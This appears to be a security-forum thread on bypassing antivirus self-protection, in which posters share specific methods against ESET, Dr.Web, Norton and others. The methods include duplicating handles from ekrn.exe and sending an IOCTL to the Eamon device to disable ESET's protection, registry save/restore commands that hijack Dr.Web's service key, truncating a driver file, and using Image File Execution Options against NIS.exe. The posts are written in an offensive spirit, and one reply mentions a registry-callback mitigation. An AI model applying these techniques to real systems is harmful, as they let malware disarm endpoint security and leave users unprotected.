[0x16/7ton]

Note about Eset SP bypassing,found it in leaked super elite CrapBerp source pack :ugeek:
So,NOD allow to open own processes with this access:
OpenProcess(PROCESS_DUP_HANDLE|PROCESS_QUERY_INFORMATION..)
After opening process {ekrn.exe} they start enuming them handles and duplicate like here:
DuplicateHandle(ekrn_handle_process, (HANDLE)handleInfo->Handles[dwIdx].Handle, NtCurrentProcess(), &hObject, DUPLICATE_SAME_ACCESS, FALSE, DUPLICATE_SAME_ACCESS)
All duplicated handles transmitt to function NtDeviceIoControlFile with IOCTL 0x88770034:

Code: Select all

UCHAR Buff[0x4] = {0x01, 0x00, 0x00, 0x00};
NtDeviceIoControlFile(hObject, NULL, NULL, NULL, &StatusBlock, 0x88770034, Buff, sizeof(Buff), Buff, sizeof(Buff));

Okay in case when duplicated hObject == \Device\Eamon
function NtDeviceIoControlFile call fastIoDispatch->FastIoDeviceControl of eamon.sys driver.
Seems like that IOCTL 0x88770034 just disable av SP.

[Alex]

I was using the same method to exploit an old ESET's vulnerability. So, ESET still doesn't protect access to its devices. I've never checked functionalities of available IOCTLs, but this is not first and not last time when such easy scenario can be used to disarm AVs. Other AVs should also provide similar functionalities - especially if their GUIs are not protected... An old presentation (ESET once again) - Disabling Antivirus program(s).

[AlephNull314]

Open source project,anti-AV compilation.
https://github.com/AlephNull314/AbsoluteZero

[N3mes1s]

http://mallocat.com/another-journey-to- ... scalation/

affected Avira Internet security and Ahnlab V3 internet security

He used PoolBlade exploitation http://mallocat.com/wp-content/uploads/ ... lBlade.pdf

[0x16/7ton]

I decided to make the video :"how I pwn KGBav with new HIPS system"(DrWeb 9.0) with 100% stealth,without any popup windows,security alerts and etc..

What i have:
-full admin rights
-all work in user mode
-AV settings is paranoidal

Video of this tragedy:
http://www.sendspace.com/file/8bukm5

p.S.
I recommend wipe this crap from your PC,if you still believe in super elite AV protection.
p.ZZzz
SpiDie will never die :lol:

[KiFastCallEntry]

nice work 0x16/7ton, some lock tricks you discovered are not working anymore, I just get pissed off when I don't know how they protected from the tricks, some AVs do not use any kind of FS driver filter, so I dont really get how they do it

[R00tKit]

Hi

i find 2 ( one share now ) new vulnerability in Dr.Web Self Protection :

1) remove Reg key's :

Code: Select all

reg save HKLM\SYSTEM\CurrentControlSet\serviceMPTRAP  hive.hiv
reg restore HKLM\SYSTEM\CurrentControlSet\services\SpiderG3 hive.hiv

with this we can replace fake key with Dr.web key and Dr.Web will protect our service key :D
after replace SpiderG3 with serviceMPTRAP :D

reg.png (46.2 KiB) Viewed 754 times

other VA not tested ( kaspresky is safe : )


edit: solution

filter this is (RegistryCallback)
Vista SP2+ RegNtPreRestoreKey,RegNtPreSaveKey,RegNtPreReplaceKey,
and use SSDT in Vista SP2-- ( 32bit)

[R00tKit]

second method is get sys file ID is dr.web in drivers path and open file with file ID with OPEN_EXISTING + TRUNCATE_EXISTING
after this sys file will truncate after reboot no AV :D :mrgreen:

for Norton 2014 i find this also -> set image File execution option for NIS.exe -> after reboot no AV :D :mrgreen:

so simple need POC ?

[cuttingedge]

Could someone make a mirror of all the dead sendspace.com links on this thread back from 2012? There was some great shares but they did not upload them to kernalmode. Maybe someone has them archived?

Thank you!

[EP_X0FF]

Most of these links were video files. Which one exactly you want?